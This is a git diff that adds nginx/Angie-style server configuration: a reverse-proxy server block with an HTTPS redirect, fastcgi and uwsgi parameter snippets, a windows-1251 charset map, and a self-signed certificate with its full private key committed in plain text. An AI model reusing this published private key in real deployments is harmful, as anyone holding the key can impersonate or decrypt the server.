config/ssl_cfg.conf; + + include config/letsencrypt.conf; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + add_header X-Robots-Tag "noindex, follow" always; + + } + + location = /robots.txt { + add_header Content-Type text/plain; + return 200 "User-agent: *\nDisallow: /\n"; + } + + + +} + +# HTTP redirect +server { + listen 80; + server_name z.gruszczynski.eu.org; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://z.gruszczynski.eu.org$request_uri; + } +} diff --git a/snippets/fastcgi-php.conf b/snippets/fastcgi-php.conf new file mode 100644 index 0000000..467a9e7 --- /dev/null +++ b/snippets/fastcgi-php.conf @@ -0,0 +1,13 @@ +# regex to split $uri to $fastcgi_script_name and $fastcgi_path +fastcgi_split_path_info ^(.+?\.php)(/.*)$; + +# Check that the PHP script exists before passing it +try_files $fastcgi_script_name =404; + +# Bypass the fact that try_files resets $fastcgi_path_info +# see: http://trac.nginx.org/nginx/ticket/321 +set $path_info $fastcgi_path_info; +fastcgi_param PATH_INFO $path_info; + +fastcgi_index index.php; +include fastcgi.conf; diff --git a/snippets/snakeoil.conf b/snippets/snakeoil.conf new file mode 100644 index 0000000..ad26c3e --- /dev/null +++ b/snippets/snakeoil.conf @@ -0,0 +1,5 @@ +# Self signed certificates generated by the ssl-cert package +# Don't use them in a production server! + +ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem; +ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key; diff --git a/ssl/angie.crt b/ssl/angie.crt new file mode 100644 index 0000000..7bbf1b8 --- /dev/null +++ b/ssl/angie.crt @@ -0,0 +1,22 @@ +-----BEGIN CERTIFICATE----- +MIIDozCCAougAwIBAgIUFjIEKL6hVCmT52cjP5ezZjwh3rIwDQYJKoZIhvcNAQEL +BQAwYTELMAkGA1UEBhMCWFgxCzAJBgNVBAgMAlhYMQswCQYDVQQHDAJYWDELMAkG +A1UECgwCWFgxCzAJBgNVBAsMAlhYMQswCQYDVQQDDAJYWDERMA8GCSqGSIb3DQEJ +ARYCWFgwHhcNMjAxMDI0MjI0ODM0WhcNMjExMDI0MjI0ODM0WjBhMQswCQYDVQQG +EwJYWDELMAkGA1UECAwCWFgxCzAJBgNVBAcMAlhYMQswCQYDVQQKDAJYWDELMAkG +A1UECwwCWFgxCzAJBgNVBAMMAlhYMREwDwYJKoZIhvcNAQkBFgJYWDCCASIwDQYJ +KoZIhvcNAQEBBQADggEPADCCAQoCggEBAMakt0M+CVT2KlY2V7SfotBQ85dRQRH2 +aYV5q+94bpVfnDftcokbe4CXTld0deCgBaL06MhDALD/66jL8kZLG54iRcqn9nZ5 +BPGFGmQYF9ZsXS1mHA98ZvB21eQdqHv+s+VK4r3Hx8WlTrMbvH2UImBmfMOkK1ym +ZVbYsQIqJ9pSGq2scA5wTPTLPHbsKeedWR8MKC8g23AAgNDDHEIFq5X7X75vXlJc +76D65u8sDqcf7VMNtLKw//dEJPKRu6qhaXlr18hp9h9veJM4JwYXD39XhShrj35/ +qDAFYmYQ24OBAR8S36VjdG5yDliBKhaN0PHdfTJ0yaEWJVi5r8hJx90CAwEAAaNT +MFEwHQYDVR0OBBYEFJrhKMOOegxpVAQ+Rx+9KgWu1q+JMB8GA1UdIwQYMBaAFJrh +KMOOegxpVAQ+Rx+9KgWu1q+JMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL +BQADggEBAGbG1gUYNyFTRKHy0r+naQUNjHfOqZGH9tv1gJ6+Q3bp+H5wT4zmbFZd +33FSvk8OtyYsmge6pgRndTfWIc1BTAn+d8mRXcJNcok0OsalfO7vumgUzot0yM+y +OoXw5uyJsVE4qsK4ahZnnqxFhs37OHF/BDveKV6Zz9aqiJ/6ySX0uB2o/5NU67H1 +pa8iG5gkVGhBns5blJBCXlwNtyaflcw9U82ngmV/NvRB5ZCJXAVfE4due8tMlKAR +ITvoLFUMD96nuSTB+sF6xm+VMEbINF+MBSUX5HeRB/9uGIwIHX6ll9iYmyaXmyff +doacvwlzEKW5L2LKZYp9N6YsnSgFmjY= +-----END CERTIFICATE----- diff --git a/ssl/angie.key b/ssl/angie.key new file mode 100644 index 0000000..00510f6 --- /dev/null +++ b/ssl/angie.key @@ -0,0 +1,28 @@ +-----BEGIN PRIVATE KEY----- +MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDGpLdDPglU9ipW +Nle0n6LQUPOXUUER9mmFeavveG6VX5w37XKJG3uAl05XdHXgoAWi9OjIQwCw/+uo +y/JGSxueIkXKp/Z2eQTxhRpkGBfWbF0tZhwPfGbwdtXkHah7/rPlSuK9x8fFpU6z +G7x9lCJgZnzDpCtcpmVW2LECKifaUhqtrHAOcEz0yzx27CnnnVkfDCgvINtwAIDQ +wxxCBauV+1++b15SXO+g+ubvLA6nH+1TDbSysP/3RCTykbuqoWl5a9fIafYfb3iT +OCcGFw9/V4Uoa49+f6gwBWJmENuDgQEfEt+lY3Rucg5YgSoWjdDx3X0ydMmhFiVY +ua/IScfdAgMBAAECggEBAMMmDuSAjapqLC2GNaO9MLZ20NhXexWqfwAiCEe6iOk2 +hMJtA5iu5yXtf4lrYGLM0rzE3evf5038Hgg2VE26e+dexDHT0M2TFsgvez3abZC5 +5NA1AFw2Wurh1D/G4z7tes5IQ3kuS5RgUnCjTwoP/bW2+ds57V+YGPa46yy1PXG8 +fGFhjZcJTaZvwnxPLUAni3PV+PWD++Wek3cC379LC08TuXJT7mVfSf0SSgVr1Ywj ++SxxTdGhLyC1cmz9AOJ95sVCAdpTYIhKFcg8fsxYb867kQOGCktv7L6vsqrR1Far +dvxnGbZUkBWUUUlPL7TErZ/jQj4bDEG/7FLIRkqTwAECgYEA4wI9IeDG09OxerWr +J5MA5/Uv6KXsKditeRBIPqtzjBuhonWlVhDLTECGzXWjT5I3ltbuf+PXpVUDXO9N +0LJU3bTbSPipiwuOw5scF+HMrHxkEI1Ks+QYoA9Y2EbWvYV2mBUY+3bzStBdxSXp +fLfhf3WIFZFdKxAXnHi0vNZHn2ECgYEA4AMb5+jc/D9kqenmQFxqxgx2iQh0XrjP +PZ1GGWF4YQc0jWtYJxLyJlFTwNLlA0/4ml0paHRS/TwQWvYZPQod8Mf3FQ+KPGYo +WUk2wDhNM4YWMSyYZ7+UGsX36/0cF7lVbPO3o+/ogLv2W6gHrFYRNRgBCdm5Kyzw +Gdmz7UWgZf0CgYARTwlkPORMIHcG2TU8pjvKc+p8PbJ9GlVXxsMLbD06MJ0pavj5 +T/yASuc8YTzbg1WTvb2fqLq3k3zXKDPxtrc71F9n9/XNcUsoZPpGY+QcPrvOe0d3 +4etywNjQXM5g0v1Q6ULnYZF5YdvUfWiJJugdtNN0eYn2D5sNRjLZtyjs4QKBgB3b +bDnByMp6LJGVElJbvwN8n8Pt84y4dy7QKoqxehj8m92JhCtZFBtVVaNquIlzfEAe +0KkScAk+mzN0f7KqCYmRLXaKJrOcLh6QapK+LlQCuCx/tCSH3VagMkYq6zaiRieK +aFyaWlPmOZTH1ZX7trlr5J+KfGqrx6i6YofqctGFAoGAQ6o++4D/6rPy/ZXVZfea +C5DYHVqpMHkv2Pi/whmQKLHck1ey0b2C6oMQVo+aq8eqz76Xaz/WBTYL9wQhT+po +IQuV3tbbQEh5nSWwJc7HuXRrxg4XJEAHJ1Ut1rMYEIr/mvvBk0PvpcbnVJWV30qf +ql6SAOG3Pp4nSFaGOqGuioc= +-----END PRIVATE KEY----- diff --git a/uwsgi_params b/uwsgi_params new file mode 100644 index 0000000..5abf809 --- /dev/null +++ b/uwsgi_params @@ -0,0 +1,16 @@ +uwsgi_param QUERY_STRING $query_string; +uwsgi_param REQUEST_METHOD $request_method; +uwsgi_param CONTENT_TYPE $content_type; +uwsgi_param CONTENT_LENGTH $content_length; + +uwsgi_param REQUEST_URI $request_uri; +uwsgi_param PATH_INFO $document_uri; +uwsgi_param DOCUMENT_ROOT $document_root; +uwsgi_param SERVER_PROTOCOL $server_protocol; +uwsgi_param REQUEST_SCHEME $scheme; +uwsgi_param HTTPS $https if_not_empty; + +uwsgi_param REMOTE_ADDR $remote_addr; +uwsgi_param REMOTE_PORT $remote_port; +uwsgi_param SERVER_PORT $server_port; +uwsgi_param SERVER_NAME $server_name; diff --git a/win-utf b/win-utf new file mode 100644 index 0000000..774fd9f --- /dev/null +++ b/win-utf @@ -0,0 +1,125 @@ +# This map is not a full windows-1251 <> utf8 map: it does not +# contain Serbian and Macedonian letters. If you need a full map, +# use contrib/unicode2nginx/win-utf map instead. + +charset_map windows-1251 utf-8 { + + 82 E2809A; # single low-9 quotation mark + + 84 E2809E; # double low-9 quotation mark + 85 E280A6; # ellipsis + 86 E280A0; # dagger + 87 E280A1; # double dagger + 88 E282AC; # euro + 89 E280B0; # per mille + + 91 E28098; # left single quotation mark + 92 E28099; # right single quotation mark + 93 E2809C; # left double quotation mark + 94 E2809D; # right double quotation mark + 95 E280A2; # bullet + 96 E28093; # en dash + 97 E28094; # em dash + + 99 E284A2; # trade mark sign + + A0 C2A0; #   + A1 D18E; # capital Byelorussian short U + A2 D19E; # small Byelorussian short u + + A4 C2A4; # currency sign + A5 D290; # capital Ukrainian soft G + A6 C2A6; # borken bar + A7 C2A7; # section sign + A8 D081; # capital YO + A9 C2A9; # (C) + AA D084; # capital Ukrainian YE + AB C2AB; # left-pointing double angle quotation mark + AC C2AC; # not sign + AD C2AD; # soft hypen + AE C2AE; # (R) + AF D087; # capital Ukrainian YI + + B0 C2B0; # ° + B1 C2B1; # plus-minus sign + B2 D086; # capital Ukrainian I + B3 D196; # small Ukrainian i + B4 D291; # small Ukrainian soft g + B5 C2B5; # micro sign + B6 C2B6; # pilcrow sign + B7 C2B7; # · + B8 D191; # small yo + B9 E28496; # numero sign + BA D194; # small Ukrainian ye + BB C2BB; # right-pointing double angle quotation mark + + BF D197; # small Ukrainian yi + + C0 D090; # capital A + C1 D091; # capital B + C2 D092; # capital V + C3 D093; # capital G + C4 D094; # capital D + C5 D095; # capital YE + C6 D096; # capital ZH + C7 D097; # capital Z + C8 D098; # capital I + C9 D099; # capital J + CA D09A; # capital K + CB D09B; # capital L + CC D09C; # capital M + CD D09D; # capital N + CE D09E; # capital O + CF D09F; # capital P + + D0 D0A0; # capital R + D1 D0A1; # capital S + D2 D0A2; # capital T + D3 D0A3; # capital U + D4 D0A4; # capital F + D5 D0A5; # capital KH + D6 D0A6; # capital TS + D7 D0A7; # capital CH + D8 D0A8; # capital SH + D9 D0A9; # capital SHCH + DA D0AA; # capital hard sign + DB D0AB; # capital Y + DC D0AC; # capital soft sign + DD D0AD; # capital E + DE D0AE; # capital YU + DF D0AF; # capital YA + + E0 D0B0; # small a + E1 D0B1; # small b + E2 D0B2; # small v + E3 D0B3; # small g + E4 D0B4; # small d + E5 D0B5; # small ye + E6 D0B6; # small zh + E7 D0B7; # small z + E8 D0B8; # small i + E9 D0B9; # small j + EA D0BA; # small k + EB D0BB; # small l + EC D0BC; # small m + ED D0BD; # small n + EE D0BE; # small o + EF D0BF; # small p + + F0 D180; # small r + F1 D181; # small s + F2 D182; # small t + F3 D183; # small u + F4 D184; # small f + F5 D185; # small kh + F6 D186; # small ts + F7 D187; # small ch + F8 D188; # small sh + F9 D189; # small shch + FA D18A; # small hard sign + FB D18B; # small y + FC D18C; # small soft sign + FD D18D; # small e + FE D18E; # small yu + FF D18F; # small ya +}